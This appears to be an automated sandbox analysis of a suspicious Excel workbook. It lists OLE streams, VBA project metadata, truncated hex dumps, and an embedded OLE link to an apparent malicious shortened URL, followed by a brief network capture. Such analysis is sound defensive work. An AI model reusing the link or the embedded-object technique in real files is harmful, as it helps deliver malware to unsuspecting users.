                    Stream Path:MBD006207A5/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:37036
                    Entropy:7.720975169587741
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.25248375192737
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/\x5DocumentSummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:244
                    Entropy:2.701136490257069
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                    General
                    Stream Path:MBD006207A6/\x5SummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:220
                    Entropy:3.372234242231489
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                    General
                    Stream Path:MBD006207A6/MBD0018D4CE/\x1Ole
                    CLSID:
                    File Type:data
                    Stream Size:20
                    Entropy:0.5689955935892812
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD0018D4CE/\x3ObjInfo
                    CLSID:
                    File Type:data
                    Stream Size:4
                    Entropy:0.8112781244591328
                    Base64 Encoded:False
                    Data ASCII:. . . .
                    Data Raw:00 00 03 00
                    General
                    Stream Path:MBD006207A6/MBD0018D4CE/Contents
                    CLSID:
                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                    Stream Size:197671
                    Entropy:6.989042939766534
                    Base64 Encoded:True
                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD0068D442/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.219515110876372
                    Base64 Encoded:False
                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD0068D442/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:26243
                    Entropy:7.635433729726103
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.25248375192737
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/\x5DocumentSummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:248
                    Entropy:3.0523231150355867
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/\x5SummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:256
                    Entropy:4.086306928392587
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/Workbook
                    CLSID:
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:134792
                    Entropy:7.974168320310173
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                    CLSID:
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:468
                    Entropy:5.269289820125323
                    Base64 Encoded:True
                    Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                    Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                    CLSID:
                    File Type:data
                    Stream Size:83
                    Entropy:3.0672749060249043
                    Base64 Encoded:False
                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                    CLSID:
                    File Type:data
                    Stream Size:2486
                    Entropy:3.9244127831265385
                    Base64 Encoded:False
                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                    CLSID:
                    File Type:data
                    Stream Size:536
                    Entropy:6.330646364694152
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                    Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                    General
                    Stream Path:MBD006207A6/MBD00726B69/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.219515110876372
                    Base64 Encoded:False
                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/MBD00726B69/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:26242
                    Entropy:7.635424485665502
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A6/Workbook
                    CLSID:
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:283872
                    Entropy:7.743278150467805
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                    General
                    Stream Path:MBD006207A7/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:99
                    Entropy:3.631242196770981
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A7/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:45934
                    Entropy:7.5587990853484195
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A8/\x1Ole
                    CLSID:
                    File Type:data
                    Stream Size:806
                    Entropy:5.102215976650107
                    Base64 Encoded:False
                    Data ASCII:. . . . A . l - { . . . . . . . . . . . . 2 . . . y . . . K . . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . q . j . E . 1 . B . c . W . g . ? . & . s . m . o . k . e . = . w . e . a . l . t . h . y . & . c . o . m . m . a . = . a . n . n . o . y . e . d . & . t . a . n . k . f . u . l . = . w . a . c . k . y . & . l . i . t . e . r . a . t . u . r . e . . . P . . S . # c - . " . . : P . H 9 M R 3 7 9 k 6 O o ~ g j . . . , / [ . v [ D " v Z c . 4 5 ~ . @ < J . M
                    Data Raw:01 00 00 02 41 8f 02 6c 2d 81 d8 7b 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 2e 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 71 00 6a 00 45 00 31 00 42 00 63 00 57 00 67 00 3f 00 26 00 73 00 6d 00 6f 00 6b 00 65 00 3d 00 77 00 65 00 61 00
                    General
                    Stream Path:Workbook
                    CLSID:
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:319988
                    Entropy:7.998590879161447
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . l k e " . . T R 7 $ + G . ~ " K e . . 9 # } C _ V . . . . . . . . . M . . . \\ . p . r [ O I U . . w . t n 6 3 q H . . F u . [ 8 . L * V ' 1 ) e > . . . . * \\ . . 2 . 5 y . . . d 7 & . . B . . . a . . . % M . . . = . . . . . . . . * 6 @ . j . N ` . . . . . . . . . . a . . . . 3 . . . . . . . . ; . . . . \\ = . . . P ` d > a [ / . . g [ @ . . . @ . . . k " . . . . ` . . . . F 1 . . . 3 . . . . 1 . . . ) $ . $ r V q ) . E | ; [ v . O & L 0 . 1 . . . . . . 5
                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 6c b5 ce 6b 65 a6 dc 22 7f 7f 54 52 37 24 2b 47 7f 7e 9e 22 4b 65 0d 13 39 23 7d ac 94 8a ea fc f1 43 8e 85 ba b6 82 5f f6 56 87 2e bc da e4 0a e1 00 02 00 b0 04 c1 00 02 00 8d 4d e2 00 00 00 5c 00 70 00 fa 72 5b 91 4f dc 49 f3 e1 e2 c4 55 8a cb fd 02 19 77 0f a0 74 d2 d5 ff a1 6e da 36 df 33
                    General
                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                    CLSID:
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:527
                    Entropy:5.254178060321263
                    Base64 Encoded:True
                    Data ASCII:I D = " { E 1 2 2 2 7 D 7 - 3 F 5 8 - 4 E C 2 - A 9 2 4 - 4 C 8 5 C 1 0 E 7 5 E B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 9 1 B C 7 F D C B F D C B F D C
                    Data Raw:49 44 3d 22 7b 45 31 32 32 32 37 44 37 2d 33 46 35 38 2d 34 45 43 32 2d 41 39 32 34 2d 34 43 38 35 43 31 30 45 37 35 45 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                    General
                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                    CLSID:
                    File Type:data
                    Stream Size:104
                    Entropy:3.0488640812019017
                    Base64 Encoded:False
                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 20, 2024 16:05:18.425332069 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:18.425383091 CET4434981614.103.79.10192.168.2.24
                    Dec 20, 2024 16:05:18.425441980 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:18.427438974 CET49816443192.168.2.2414.103.79.10
                    Dec 20, 2024 16:05:18.427453995 CET4434981614.103.79.10192.168.2.24
